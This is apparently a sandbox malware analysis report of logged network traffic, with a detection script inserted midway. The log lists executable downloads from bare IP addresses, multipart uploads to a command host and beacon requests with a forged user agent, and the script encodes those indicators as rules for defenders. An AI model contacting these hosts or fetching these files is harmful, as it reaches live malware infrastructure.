                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f852a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f862a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f872a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f802a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f812a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f822a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ELDFYF6FVMALBMEKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f832a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69CG12IRG7UZ4Y55RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16317Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K6NFPX18WTZ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20392Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7DWO65S59JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2533Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HJFYW40R53RYOQFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582282Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IJHGS9EFL23HZE32DSBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12853Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3ZSNFYJ782OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16281Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M4KDJKHLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20368Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16 (this entry is repeated 50 times in the report; the address is contacted directly, with no name resolution)
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Code function: 6_2_00B0E0C0 recv,recv,recv,recv, 6_2_00B0E0C0
                            Source: global traffic | HTTP traffic detected: GET /forsale/infinity.exe HTTP/1.1 | Host: 91.240.118.49
                            Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38c926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38d926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38a926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38b926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb388926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb389926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb386926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb387926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f842a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f852a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f862a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f872a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f802a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f812a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f822a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f832a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 176.113.115.96
                            Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
                            Source: global traffic | HTTP traffic detected: GET /files/941767796/ktIplF5.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /testdef/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /defend/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
                            Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /defend/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: global traffic | DNS traffic detected: DNS query: warlikedbeliev.org
                            Source: global traffic | DNS traffic detected: DNS query: DGGKjBirXBdcY.DGGKjBirXBdcY
                            Source: global traffic | DNS traffic detected: DNS query: breakfasutwy.cyou
                            Source: global traffic | DNS traffic detected: DNS query: bloodyswif.lat
                            Source: global traffic | DNS traffic detected: DNS query: washyceehsu.lat
                            Source: global traffic | DNS traffic detected: DNS query: leggelatez.lat
                            Source: global traffic | DNS traffic detected: DNS query: miniatureyu.lat
                            Source: global traffic | DNS traffic detected: DNS query: kickykiduz.lat
                            Source: global traffic | DNS traffic detected: DNS query: savorraiykj.lat
                            Source: global traffic | DNS traffic detected: DNS query: shoefeatthe.lat
                            Source: global traffic | DNS traffic detected: DNS query: finickypwk.lat
                            Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                            Source: global traffic | DNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC
                            Source: global traffic | DNS traffic detected: DNS query: www.google.com
                            Source: global traffic | DNS traffic detected: DNS query: httpbin.org
                            Source: global traffic | DNS traffic detected: DNS query: apis.google.com
                            Source: global traffic | DNS traffic detected: DNS query: play.google.com
                            Source: global traffic | DNS traffic detected: DNS query: home.fivegg5th.top
                            Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
                            Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                            Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
                            Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
                            Source: global traffic | DNS traffic detected: DNS query: c.msn.com
                            Source: global traffic | DNS traffic detected: DNS query: api.msn.com
                            Source: global traffic | DNS traffic detected: DNS query: rampnatleadk.click
                            Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                            Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: warlikedbeliev.org
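The HTTP and DNS entries above are the observables a defender turns into detections: executables and a .bat fetched from bare IP addresses (185.215.113.16, 185.215.113.97, 91.240.118.49), the multipart POST /api exchanges with warlikedbeliev.org, the /ai/?key= requests to 176.113.115.96 carrying a user agent that claims "Windows NT 9.0" (no released Windows version identifies itself that way), and DNS queries for names made of one label repeated twice (DGGKjBirXBdcY.DGGKjBirXBdcY) or for the .lat/.cyou/.top/.click names listed. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample. It encodes those indicators as rules and runs them over constructed proxy and DNS log lines; the pipe-delimited log format, the sample lines, the rule names and the 10.0.0.5 control entry are assumptions made for the example, and the exact-match host list only covers the infrastructure seen in this one analysis.

```python
"""Triage proxy and DNS log lines against the network indicators in the report above."""
from __future__ import annotations

import ipaddress
import re

# Hosts contacted over HTTP in the report (exact-match indicators).
REPORT_HTTP_HOSTS = {
    "warlikedbeliev.org", "185.215.113.16", "185.215.113.97",
    "185.215.113.115", "185.215.113.43", "176.113.115.96", "91.240.118.49",
}
# Names from the report's DNS query list that do not belong to well-known services.
REPORT_DNS_NAMES = {
    "warlikedbeliev.org", "breakfasutwy.cyou", "bloodyswif.lat", "washyceehsu.lat",
    "leggelatez.lat", "miniatureyu.lat", "kickykiduz.lat", "savorraiykj.lat",
    "shoefeatthe.lat", "finickypwk.lat", "home.fivegg5th.top", "rampnatleadk.click",
}
# No released Windows build reports "Windows NT 9.0"; the user agent on the
# 176.113.115.96 requests is fabricated, so the substring is a usable signature.
BOGUS_UA = re.compile(r"Windows NT 9\.0\b")
PAYLOAD_SUFFIXES = (".exe", ".bat")   # /steam/random.exe, /test/am_no.bat, ...


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IPv4 address (optional :port stripped)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def parse_proxy_line(line: str) -> dict:
    """Constructed log format (assumption): method|host|path|content-type|user-agent."""
    method, host, path, ctype, ua = (f.strip() for f in line.split("|", 4))
    return {"method": method, "host": host.lower(), "path": path, "ctype": ctype, "ua": ua}


def score_http(ev: dict) -> list[str]:
    """Return the report-derived reasons a request is suspicious (empty list = clean)."""
    reasons = []
    if ev["host"] in REPORT_HTTP_HOSTS:
        reasons.append("host listed in report")
    if is_ip_literal(ev["host"]) and ev["path"].lower().endswith(PAYLOAD_SUFFIXES):
        reasons.append("payload fetched from bare IP")
    if BOGUS_UA.search(ev["ua"]):
        reasons.append("impossible Windows NT 9.0 user agent")
    if (ev["method"] == "POST" and ev["path"] == "/api"
            and ev["ctype"].startswith("multipart/form-data")
            and not is_ip_literal(ev["host"])):
        reasons.append("multipart POST /api beacon shape")   # the warlikedbeliev.org exchanges
    return reasons


def score_dns(qname: str) -> list[str]:
    """Return the report-derived reasons a DNS query name is suspicious."""
    name = qname.lower().rstrip(".")
    reasons = []
    if name in REPORT_DNS_NAMES:
        reasons.append("name listed in report")
    labels = name.split(".")
    if len(labels) == 2 and labels[0] == labels[1]:
        # e.g. DGGKjBirXBdcY.DGGKjBirXBdcY: the same label twice, no real TLD
        reasons.append("repeated-label pseudo domain")
    return reasons


# Constructed sample lines (not from the report). The first three mirror request
# shapes in the report, the fourth is an internal control, the last two are benign.
SAMPLE_PROXY = [
    "GET|185.215.113.16|/steam/random.exe|-|Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0.0.0",
    "GET|176.113.115.96|/ai/?key=8f3f2b3a|-|Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "POST|warlikedbeliev.org|/api|multipart/form-data; boundary=M4KDJKHL|Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0.0.0",
    "GET|10.0.0.5|/installer/setup.exe|-|Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "GET|www.google.com|/|-|Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/119.0.0.0",
    "POST|api.example.com|/api|application/json|Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]
SAMPLE_DNS = ["warlikedbeliev.org", "DGGKjBirXBdcY.DGGKjBirXBdcY", "bloodyswif.lat", "ntp.msn.com"]


def triage(proxy_lines=SAMPLE_PROXY, dns_names=SAMPLE_DNS) -> dict[str, list[str]]:
    """Map each flagged request or query to its reasons; clean entries are omitted."""
    hits: dict[str, list[str]] = {}
    for line in proxy_lines:
        ev = parse_proxy_line(line)
        if reasons := score_http(ev):
            hits[f"{ev['method']} {ev['host']}{ev['path']}"] = reasons
    for qname in dns_names:
        if reasons := score_dns(qname):
            hits[f"DNS {qname}"] = reasons
    return hits


if __name__ == "__main__":
    for key, reasons in triage().items():
        print(f"{key}: {', '.join(reasons)}")
```

The bare-IP rule also fires on the constructed 10.0.0.5 line, which is intentional: direct-to-IP executable downloads are routine on some internal networks, so in production that rule needs an allowlist of internal ranges. The host and name lists are exact matches and only catch this sample's infrastructure; the user-agent rule and the request-shape rules are the parts that generalise to the next build served from different addresses.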
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000109F000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/
